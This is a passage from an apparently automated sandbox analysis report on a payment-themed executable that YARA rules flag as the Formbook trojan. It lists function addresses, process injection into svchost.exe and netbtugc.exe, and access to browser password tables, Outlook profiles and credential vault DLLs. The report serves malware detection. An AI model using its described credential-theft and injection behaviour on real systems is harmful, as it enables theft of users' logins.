            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B31460
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5FB80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB5BF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B7DBF9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFFB76
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BDDAAC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B85AA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE1AA3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BEDAC6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB3A6C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFFA49
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF7A46
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BD5910
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B49950
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5B950
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B438E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BAD800
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFFFB1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B41F92
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFFF09
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B49EB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5FDC0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF7D73
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF1D5A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B43D40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFFCF2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB9C32
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039B03E6
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038FE3F0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039AA352
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039702C0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03990274
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039B01AA
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039A41A2
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039A81CC
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0398A118
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038E0100
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03978158
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03982000
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038EC7C0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03914750
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038F0770
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0390C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039B0591
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038F0535
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0399E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03994420
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039A2446
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039A6BD7
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039AAB40
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038EEA80
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038F29A0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039BA9A6
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03906962
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038D68B8
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0391E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038F2840
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038FA840
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0396EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038E2FC8
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038FCFE0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03910F30
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03992F30
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03932F28
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03964F40
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03902E90
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039ACE93
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039AEEDB
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039AEE26
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038F0E59
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03908DBF
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038EADE0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0398CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038FAD00
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03990CB5
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038E0CF2
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038F0C00
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0393739A
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039A132D
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038DD34C
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038F52A0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0390B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039912ED
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038FB1B0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039BB16B
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0392516C
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038DF172
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038F70C0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0399F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039A70E9
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039AF0E0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039AF7B0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039A16CC
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03935630
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0398D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039B95C3
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039A7571
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039AF43F
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038E1460
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0390FB80
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03965BF0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0392DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039AFB76
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03935AA0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0398DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03991AA3
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0399DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039AFA49
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039A7A46
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03963A6C
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03985910
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0390B950
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038F9950
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038F38E0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0395D800
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038F1F92
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039AFFB1
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038B3FD2
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038B3FD5
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039AFF09
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038F9EB0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0390FDC0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039A1D5A
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_038F3D40
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039A7D73
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_039AFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03969C32
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02D91A30
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02D8CB80
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02D8C959
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02D8C960
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02D8AC00
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02D9329B
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02D932A0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02D93259
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02D950B0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02DAB5F0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0360E338
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0360E7EC
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0360E453
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0360CB03
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0360CAAB
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0360D858
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03BAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03BBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B2B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B87E54 appears 111 times
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: String function: 00D909B0 appears 46 times
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: String function: 00D948F3 appears 53 times
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: String function: 00D73536 appears 40 times
            Source: C:\Users\user\Desktop\PAGO $830.900.exe Code function: String function: 00D7B606 appears 32 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 0396F290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 03925130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 038DB970 appears 280 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 03937E54 appears 111 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 0395EA12 appears 86 times
            Source: PAGO $830.900.exe, 00000000.00000003.2042631578.0000000003D2D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PAGO $830.900.exe
            Source: PAGO $830.900.exe, 00000000.00000003.2043913424.0000000003B83000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PAGO $830.900.exe
            Source: PAGO $830.900.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4479452466.0000000003220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4482452521.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4479040765.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4480467614.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2236251136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2237968521.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2238057070.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4480505595.0000000004270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@20/12
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DE36D3 GetLastError,FormatMessageW, 0_2_00DE36D3
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DD1003 AdjustTokenPrivileges,CloseHandle, 0_2_00DD1003
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DD1607 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00DD1607
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DE50EB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_00DE50EB
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DFA5A3 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00DFA5A3
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DE63AC _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 0_2_00DE63AC
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00D76122 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00D76122
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | File created: C:\Users\user\AppData\Local\Temp\autF312.tmp
            Source: PAGO $830.900.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: netbtugc.exe, 00000004.00000002.4479582993.0000000003331000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4479582993.000000000335F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2525221701.000000000333C000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2523077743.0000000003331000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PAGO $830.900.exe | ReversingLabs: Detection: 62%
            Source: unknown | Process created: C:\Users\user\Desktop\PAGO $830.900.exe "C:\Users\user\Desktop\PAGO $830.900.exe"
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PAGO $830.900.exe"
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PAGO $830.900.exe"
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: PAGO $830.900.exe | Static file information: File size 1280512 > 1048576
            Source: PAGO $830.900.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: PAGO $830.900.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: PAGO $830.900.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: PAGO $830.900.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: PAGO $830.900.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: PAGO $830.900.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: PAGO $830.900.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XXOIkqUXwzoOEy.exe, 00000003.00000000.2155456066.00000000006BE000.00000002.00000001.01000000.00000004.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4479745513.00000000006BE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PAGO $830.900.exe, 00000000.00000003.2045771670.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, PAGO $830.900.exe, 00000000.00000003.2045918029.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2137653598.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2237383010.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2237383010.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2139562708.0000000003900000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2239500272.0000000003703000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2236327251.000000000355E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4480765561.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4480765561.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
